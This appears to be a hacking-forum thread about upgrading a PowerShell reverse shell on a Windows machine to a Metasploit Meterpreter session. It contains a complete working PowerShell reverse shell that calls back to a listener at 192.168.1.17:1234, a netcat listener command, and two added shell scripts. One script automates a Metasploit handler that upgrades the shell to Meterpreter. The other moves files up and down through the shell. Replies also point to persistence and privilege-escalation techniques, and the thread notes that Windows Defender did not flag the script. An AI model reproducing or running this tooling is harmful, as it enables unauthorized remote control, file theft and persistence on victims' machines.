Forum Thread: How Do I Switch a Netcat Shell to a Metasploit Meterpreter?

So I have a reverse shell on a Windows box through PowerShell and was wondering if there was a way to switch it over to a Meterpreter session in Metasploit.

Reverse shell code (.ps1):

function cleanup {
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit}
# Listener address and port; must match the nc listener on the attacking box
$address = '192.168.1.17'
$port = '1234'
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect($address,$port)
$stream = $client.GetStream()
# Byte array for socket reads (the [] had been lost from "System.Byte[]")
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
# Spawn a child powershell.exe with stdin and stdout redirected through this script.
# stderr is not redirected, so the child's error text never reaches the listener.
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = New-Object System.Text.AsciiEncoding
# Send the child's initial banner and prompt to the listener
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
    if ($client.Connected -ne $true) {cleanup}
    # Read from the socket until a newline (byte 10) arrives, the buffer fills,
    # or the peer closes the connection (Read returns 0)
    $pos = 0; $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $i = $read
        $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
    if ($pos -gt 0) {
        # Hand the received line to the child's stdin, then relay its output back
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.Write($string)
        Start-Sleep 1
        if ($process.ExitCode -ne $null) {cleanup}
        else {
            $out = $encoding.GetString($outputstream.Read())
            while($outputstream.Peek() -ne -1){
                # Drop the echoed command line so it is not sent back a second time
                $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
            $stream.Write($encoding.GetBytes($out),0,$out.Length)
            $out = $null
            $string = $null}} else {cleanup}}

Listener:
rlwrap nc -lvp 1234

I got the code from Setoolkit in Kali and just changed $process.StartInfo.FileName to the path of powershell.exe.

For the listener I used rlwrap because it gave me the up and down arrow keys for command history (I'm not quite sure what it's called XD), and before that the backspace key didn't delete characters.

Does anyone have an idea of how to switch it to Meterpreter? It would be awesome if there were a better solution than transferring a Meterpreter payload file to it, setting up a separate listener, and executing it.

4 Responses

The Windows box is running Windows Defender, which hasn't detected anything so far.

Metasploit has a built-in handler function: catch a standard shell with that, then background it with Ctrl-Z. Search for "shell to meterpreter", fill in the options, and run. You should have a Meterpreter session. I would, however, caution you away from relying on Meterpreter's tool suite, and Metasploit in general: it is far, far better to know how to do what needs doing by yourself without relying on a tool to do it for you.
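The procedure in the response above, written out as an added example (not from the original thread or from Metasploit's own docs): a small script for the attacking box that writes the msfconsole resource file for the handler and starts it. The handler catches the PowerShell script above as a Windows shell session on the same LHOST/LPORT the .ps1 connects to, and the AutoRunScript option runs post/multi/manage/shell_to_meterpreter on every new session so nothing has to be typed after Ctrl-Z. The file names are assumptions; the addresses are the ones from the .ps1.

```shell
#!/bin/sh
# Added example, not part of the original thread. Writes an msfconsole resource
# script that catches the PowerShell reverse shell and upgrades it to Meterpreter.
# Assumptions: LHOST/LPORT are the values of $address/$port in the .ps1 above;
# the output file name is arbitrary.
set -eu

# Write the resource script to OUT for the given listener address and port.
write_upgrade_rc() {
  lhost="$1"; lport="$2"; out="$3"
  cat > "$out" <<EOF
# Catch the raw shell as a Windows shell session (rather than generic/*), so
# the upgrade module knows which platform it is dealing with.
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LHOST $lhost
set LPORT $lport
# Keep listening after the first session; requires running the handler as a job.
set ExitOnSession false
# Upgrade each new shell session automatically. The post module opens its own
# Meterpreter handler (LPORT 4433 unless changed) and stages a Meterpreter
# payload through the shell; on Windows it uses PowerShell for that by default.
set AutoRunScript post/multi/manage/shell_to_meterpreter
exploit -j
EOF
}

# Start msfconsole with the generated script; then run the .ps1 on the target.
start_handler() {
  rc="$1"
  command -v msfconsole >/dev/null 2>&1 || { echo "msfconsole not found in PATH" >&2; return 1; }
  msfconsole -q -r "$rc"
}

# Usage: ./handler.sh 192.168.1.17 1234
if [ "$#" -eq 2 ]; then
  write_upgrade_rc "$1" "$2" upgrade.rc
  start_handler upgrade.rc
fi
```

Without AutoRunScript the same thing is done by hand: once the shell session shows up, Ctrl-Z to background it and run `sessions -u 1` (or `use post/multi/manage/shell_to_meterpreter`, `set SESSION 1`, `run`). Either way the upgrade still delivers a Meterpreter stager to the box through the shell, which is the same AV exposure as dropping a payload file, only automated; a plain TCP-client script slipping past Defender says nothing about whether the stager will.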

Thanks for the response.

I have a couple of questions. First, what is the name of the handler that you said could catch my shell? And second, is there any way that I could learn to create Meterpreter functionalities and integrate them into my standard shell without the help of Metasploit?

1) exploit/multi/handler

2) Not all of them, especially since Meterpreter is the product of years of work by teams of people. However, you can get clever with the target, and you won't even need custom tools - just living off the land, you can get significant functionality, including file uploads and downloads, persistence, and privilege escalation.
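The file upload and download the response above says you can get by living off the land, as an added example that is not part of the original thread: helpers for the attacking box (run beside `rlwrap nc -lvp 1234`) that turn a local file into PowerShell lines to paste into the existing shell, and that rebuild a file the target sends back as base64. No second listener and no tool on the target are needed; the target side is only [Convert] and [IO.File] calls. The remote paths and the chunk size are assumptions, and the Get-FileHash check assumes PowerShell 4 or later on the target.

```shell
#!/bin/sh
# Added example, not part of the original thread: attacker-side helpers for
# moving files through the plain PowerShell reverse shell above.
# Assumptions: GNU coreutils (base64 -w0, fold); remote paths are hypothetical.
set -eu

# Characters of base64 per pasted line. The .ps1 above feeds the child one
# socket read at a time and breaks on newline, so short lines are safer than
# one enormous one.
CHUNK=3000

# Print the PowerShell lines that recreate LOCAL_FILE at REMOTE_PATH. Paste the
# output into the nc shell; the last line prints the SHA-256 of the written file
# so it can be compared with sha256sum of the local copy.
ps_upload_cmds() {
  local_file="$1"; remote_path="$2"
  printf '$b64 = ""\n'
  { base64 -w0 "$local_file"; printf '\n'; } | fold -w "$CHUNK" | while IFS= read -r chunk; do
    printf '$b64 += "%s"\n' "$chunk"
  done
  printf '%s\n' "[IO.File]::WriteAllBytes('$remote_path', [Convert]::FromBase64String(\$b64))"
  printf '%s\n' "(Get-FileHash '$remote_path' -Algorithm SHA256).Hash"
}

# Print the one PowerShell line whose output is REMOTE_PATH as base64.
ps_download_cmd() {
  printf '%s\n' "[Convert]::ToBase64String([IO.File]::ReadAllBytes('$1'))"
}

# Rebuild a file from the base64 line saved out of the nc session. The shell
# echoes with CRLF line endings, so strip CR/LF/spaces before decoding.
decode_download() {
  captured="$1"; out="$2"
  tr -d '\r\n ' < "$captured" | base64 -d > "$out"
}

# Usage: ./xfer.sh upload ./tool.exe 'C:\Users\Public\tool.exe'   (paste the output into nc)
#        ./xfer.sh download 'C:\Users\Public\loot.bin'            (paste the output into nc)
#        ./xfer.sh decode captured.txt ./loot.bin                  (captured.txt = the base64 line)
case "${1:-}" in
  upload)   ps_upload_cmds "$2" "$3" ;;
  download) ps_download_cmd "$2" ;;
  decode)   decode_download "$2" "$3" ;;
esac
```

The same channel carries the rest of what the response lists: persistence is a Run-key or scheduled-task one-liner typed into the shell, and enumeration for privilege escalation is whoami /priv, Get-Acl and friends. Binary content never has to touch the wire as raw bytes, which matters here because the .ps1 uses ASCII encoding in both directions.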
